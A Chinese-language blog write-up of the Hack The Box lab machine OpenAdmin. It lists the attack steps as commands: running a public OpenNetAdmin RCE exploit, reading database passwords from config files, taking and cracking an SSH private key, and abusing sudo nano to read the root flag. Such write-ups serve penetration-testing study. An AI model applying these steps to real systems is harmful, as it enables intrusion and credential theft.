OpenAdmin(HTB)

转移了OneNote中的文章 还木有配图

信息搜集

dirb扫描发现 http://10.10.10.171/artwork 和 http://10.10.10.171/music/ artwork中无明显漏洞 music的login可以以guest方式登录

点击右上角切换用户 admin:admin直接登录 但也没什么用 根据页面标题 searchsploit opennetadmin 发现该版本存在RCE

openadmin rce

mkdir OpenAdmin && cd OpenAdmin && searchsploit -m 47691 && dos2unix 47691.sh
./47691.sh http://10.10.10.171/ona/login.php 

拿到www-data权限

拿普通用户权限

发现存在用户jimmy和joanna

ls /opt/ona/www/local/config/
cat /opt/ona/www/local/config/database_settings.inc.php

查看配置文件 发现数据库用户和密码

cat /etc/apache2/sites-available/openadmin.conf

发现ServerAdmin jimmy@openadmin.htb

尝试使用该密码登录jimmy成功 但没有user.txt
继续寻找 发现/var/www 目录下 有所有者为Jimmy的文件夹

ls /etc/apache2/sites-available/
通过internal.conf了解到 原来internal是跑在127.0.0.1:52846上的WEB服务
curl http://127.0.0.1:52846/main.php
拿到joanna的id_rsa 破解密钥密码
/usr/share/john/ssh2john.py id_rsa > hash
登录 拿到user权限

提权

sudo -l
sudo /bin/nano /opt/priv
Ctrl+R /root/root.txt

拿到root权限


© 2021. All rights reserved.

本站总访问量 Web Analytics

Powered by Hydejack v9.1.2 & Moded by ZYA